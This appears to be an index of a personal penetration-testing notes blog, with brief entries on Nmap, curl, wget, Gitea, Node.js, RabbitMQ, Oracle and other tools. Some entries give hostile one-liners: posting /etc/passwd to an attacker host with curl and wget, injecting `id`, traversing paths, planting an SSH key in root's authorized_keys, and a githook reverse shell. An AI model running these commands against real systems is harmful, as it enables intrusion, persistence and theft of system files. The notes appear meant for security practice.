Software - akde/infosec

Nmap scripts

9. June 2024

Nmap has it’s own scripting language with which complex or recurring tasks can be automatized. See the manpage. And share/nmap/scripts. Vulnerability scan # nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt Better vulnerability scans (thanks to this source) cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh nmap --script nmap-vulners -sV -sC -p22 $victim nmap --script vulscan -sV…

whois

8. June 2024

GRPC

3. July 2023

high performance, open source universal RPC framework GRPC Client CLI Download the CLI via https://github.com/vadimi/grpc-client-cli. Then: ./grpc-client-cli $target:50051 GRPC Curl Download via https://github.com/fullstorydev/grpcurl. gRPC UI Download via https://github.com/fullstorydev/grpcui. Graphical command line interface. See also

Exiftools

23. February 2022

Create file to execute code via meta data: https://github.com/convisolabs/CVE-2021–22204-exiftool

Firebird database system

24. January 2022

See https://www.infosecmatter.com/firebird-database-exploitation/

Gitea

21. January 2022

If you can register, do this, create a repo and go to settings -> githooks and there add a command as post-receive hook like a reverse shell. See https://www.cvedetails.com/vulnerability-list/vendor_id-19185/product_id-49829/Gitea-Gitea.html

Snap

27. July 2021

https://gtfobins.github.io/gtfobins/snap/

Nodejs

29. April 2021

Execute command: const { exec } = require("child_process"); exec(“echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHGb9AwdEdyFm6SBuQeCWyKMh+CRXlMMb4l1GKlB8rnWoIzVClRfeWZnYzkBG487Mhb3svrd/ouVpXKWsFiAFSl5OJie88WJGTWc+3sU3I/TvuTbDgrqWwUMpPZj0jYgq99iaQeJDNPjKTs3w0QEq7GT1q69DU3m1jDCggdHYzMMA8byVXpCUivN1o4tkABhqSeUeZgW2Q9n2NxKkHGNvbkAoutFho1g8azgvnHI9HOExd81ppdzuAVC/YOTRtUKIB3ZNnfYS1qE7xp4fn7a/BEA+N8Axl0aaXLVLi2/RI+nwotdDb/vDXotS2X6B781xE9JboCRvJzejACszlMcI3bPq+R6UY3XILHDl3jpY70IFrpmX/aeUZ4d8m6A79EwyaQuckyU5eTVx7BH/RwH7hmtd7DR6VcxqNzteI49Yq8HwpyBU62I2AmnMuEXEvcPQLiM4947I3pxyZkYtZ5kULcXuWTMOITvPrFNuzwwPW1x3NbR+EnSbLtk8Ybr5iDyM= root@imac2019-kali’ > /root/.ssh/authorized_keys”, (error, stdout, stderr) => { if (error) { console.log(‘error: ${error.message}‘); return; } if (stderr) { console.log(‘stderr: ${stderr}‘); return; } console.log(‘stdout: ${stdout}‘);});

Curl

25. April 2021

Write into a file: curl $url -o /tmp/f.txtcurl $url --output /tmp/f.txtcurl $url > /tmp/f.txt Post a local file: curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/ Execute command and return the result: curl -d q=`id` http://localhost:21/ With a header curl --header "Host: localhost" 10.10.10.10 Use the correct path also with ../ (usefull for file traversion attacks): curl --path-as-is $target:$port/public/../../../etc/passwd

RabbitMQ

23. April 2021

A Message broker, written in Erlang. Uses the Erlang Cowboy webserver. Notes Default credentials: guest / guest (works per defalt only from localhost) Username can be changed without the old password on the command line?!rabbitmqctl change_password username newpassword Files with suffix .DCD contain credentials. If you have the Erlang cookie:erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…

XAMPP

18. April 2021

Listing of all files from a Xampp for Windows 7.4.6 installation. Look into phpinfo page — could reveals usernames.

wget

13. April 2021

Post files wget --post-file=/etc/passwd http://$attacker_ip/ Set output file: wget -O /tmp/s http://...

openssl

22. March 2021

Example of a connection: openssl s_client -connect $target:995 -crlf -quiet Issues The following message means that the server and client could not agree on a shared crypto system; probably because the server’s crypto is too old. 139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957: Add TLS 1 support: openssl s_client -connect $target:995 -crlf -quiet -tls1

YARA

15. February 2021

Yet another ridicolous acrynom is a tool for detect information in binary and text files. YARA rules are writen in text files. By calling yara with a rule file and a file to test, it either returns nothing if no rule was detected or one or multiple rules which matches the provided file. Example: The follwing rule…

Microsoft IIS

1. February 2021

Webmin / PBX

1. February 2021

Should exploit /tmp/18650.py not work, use svwar ‑m INVITE ‑e100-500 10.10.10.7 to determine the proper extension id.

Coldfusion

28. January 2021

Version 8 has an interesting vulnerability. Directory traversal with multiple/remote/14641.py reveals a SHA1 password hash. In the publicly available login page, the salt can be accessed and added to the hash:console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03’));

Gitlab

17. January 2021

Logrotate exploit RCE until 12.8.1

Supervisor

14. January 2021

Standard on port 9001. Default htauth user / 123

PuTTY

9. January 2021

PuTTY stores session information in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

FrontPage

8. January 2021

Each installation has the following directory structure: /document root /_vti_bin shtml.exe /_vti_adm admin.exe /_vti_aut author.exe The shtml.exe is for executing web browser guest’s code for a web page. author.exe and admin.exe not. Tools Sparty: Frontpage Security Audit tool.

Azure / Office365

17. December 2020

Main concepts: Tenant The “space” which an organization “rents”. Has a name. Users Groups Applications Identity model Cloud only Accounts are only in foreign systems (“cloud”) Synchronized Accounts are created and managed on-premise and synchronized to foreign systems (“cloud”) Federated Accounts are created, managed and authentificated on-premise; foreign systems (“cloud”) are also checking againts a on-premise system.…

Microsoft Office documents

22. April 2020

Generic analysis tools Extract macros with oledump Use oledump.py to extract macros. List the file contents: python oledump.py $file Example from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a document part use the first number and execute python oledump.py -s $no $file But to extract Macros,…

Oracle SQL

6. April 2020

In Oracle SQL, a SID (Service Identifier) is basically a database. Enumeration Get general information tnscmd10g -h $target Try to get a SID: tnscmd10g status-p 1521 -h $target Another tool: Oracle Scanner oscanner -s $target -P 1521 Metasploit module scanner/oracle/tnslsnr_version Brute force SID hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid nmap --script oracle-sid-brute -p 1521 $target Brute…

Magento

19. March 2020

Vulnerability scanner: https://github.com/steverobbins/magescan

journalctl

26. February 2020

It is possible to write as a user arbitrary text into the logs. Messages can be faked which could alert persons/surveillance systems. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic

tmux

21. February 2020

Create a session tmux new -s <name>

distccd

20. January 2020

Mit distccd kann man entfernt compilieren.

Wireshark

18. August 2019

See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…

Screen

18. August 2019

Screen-Sitzung mit Namen starten screen -S name Screen-Sitzungen auflisten screen -ls Screen-Sitzung fortsetzen screen -xS name